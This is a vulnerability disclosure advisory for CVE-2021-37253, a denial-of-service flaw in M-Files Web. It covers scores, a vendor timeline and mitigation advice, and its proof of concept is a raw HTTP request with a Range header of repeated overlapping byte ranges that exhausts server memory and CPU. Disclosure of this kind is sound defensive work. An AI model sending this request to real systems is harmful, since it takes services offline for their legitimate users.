M-Files Web versions prior to 20.10.9524.1 and M-Files Web versions prior to 20.10.9445.0 contain an improper range header processing vulnerability. A remote unauthenticated attacker may send crafted requests with overlapping ranges (via HTTP requests with a specially-crafted Range or Request-Range headers) to cause the web application to compress each of the requested bytes, resulting in a crash due to excessive memory and CPU consumption and preventing users from accessing the system.
156f6be8e8269992c6311ee1cad599e1338e7f7bf24b2810bb20c39727986b7c
I. SUMMARY
=============================================================================================================================================================
Title: M-Files Web Improper Range Header Processing Denial of Services
(DoS) Vulnerability
Product: M-Files Web version before 20.10.9524.1, M-Files Web version
before 20.10.9445.0
Vulnerability Type(s): Denial of Services (DoS)
Credit by/Researcher: Murat Aydemir (Turkey)
Contact: https://twitter.com/mrtydmr75
Github: https://github.com/murataydemir
=============================================================================================================================================================
II. CVE REFERENCE, CVSS SCORES & VULNERABILITY TYPES
=============================================================================================================================================================
CVE Number: CVE-2021-37253
CVSSv3 Score: 4.3
CVSSv3 Vector: CVSS:4.3 (AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L)
Severity: Medium
Confidentiality Impact: None (There is no impact to the confidentiality of
the system)
Integrity Impact: None (There is no impact to the integrity of the system)
Availability Impact: Complete (There is a total shutdown of the affected
resource. The attacker can render the resource completely unavailable)
Access Complexity: Low (Specialized access conditions or extenuating
circumstances do not exist. Very little knowledge or skill is required to
exploit)
Authentication: Not required (Authentication is not required to exploit the
vulnerability)
Gained Access: None
Vulnerability Type(s): Denial of Services (DoS)
CWE ID: CWE-399 Resource Management Errors (
https://cwe.mitre.org/data/definitions/399.html)
=============================================================================================================================================================
III. TIMELINE
=============================================================================================================================================================
Contact to Vendor: the 24th of August, 2020
Vendor (M-Files) Reply: the 3rd of November, 2020 (rejected vulnerability)
Contact to Vendor: the 4th of November, 2020 (provide additional
informations & some of proof of concepts)
Vendor (M-Files) Reply: the 6th of November, 2020 (accepted vulnerability
and ask time to fix)
Vendor (M-Files) Reply: the 4th of August, 2021 (inform me that "we're
accepting this vulnerability but we'll not give an effort to fix that and
also will not apply any CVE for this vuln.")
Contact to MITRE: the 4th of August, 2021 (contacted MITRE and applied for
CVE. MITRE has reserved CVE to me for this vulnerability)
=============================================================================================================================================================
IV. DESCRIPTION & MITIGATION
=============================================================================================================================================================
M-Files Web version before 20.10.9524.1 and M-Files Web version before
20.10.9445.0 contain an Improper Range Header Processing Vulnerability. A
remote unauthenticated attacker may send crafted requests with overlapping
ranges (via HTTP requests with a specially-crafted Range or Request-Range
headers) to cause the web application to compress each of the requested
bytes, resulting in a crash due to excessive memory and CPU consumption and
preventing users from accessing the system.
Even if this vulnerability (CVE-2021-37253) has been verified and accepted
by the Vendor (M-Files), their security team also contacted me and informed
me that no effort will be given to fixing this vulnerability. Thus, there
is no active patch, update or mitigation plan for CVE-2021-37253
vulnerability. These are not exactly fix the problem (maybe just
remediation), however I strongly recommend you to restrict IP addresses for
web applications which incoming requests/clients or reconfigure the web
server for "Byte-range Request Segment Size" as soon as possible.
=============================================================================================================================================================
V. PROOF OF CONCEPT (POC) FOR CVE-2021-37253
=============================================================================================================================================================
This is easy to detect and exploit for this vulnerability. Just find a
static content (such as .png, .jpg, .jpeg, .js, .css and so on) and make a
request as follows.
GET /Icons/Standard/Listing/VaultMounting.png HTTP/1.1
Host: <host>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0)
Gecko/20100101 Firefox/79.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Range:
bytes=0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-
Note: this issue is valid and easly reproducable for all static assests
(which has .png, .jpg, .jpeg, .js, .css, .gif extensions and so on)
=============================================================================================================================================================
VI. REFERENCE(S)
=============================================================================================================================================================
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37253
https://nvd.nist.gov/vuln/detail/CVE-2021-37253
=============================================================================================================================================================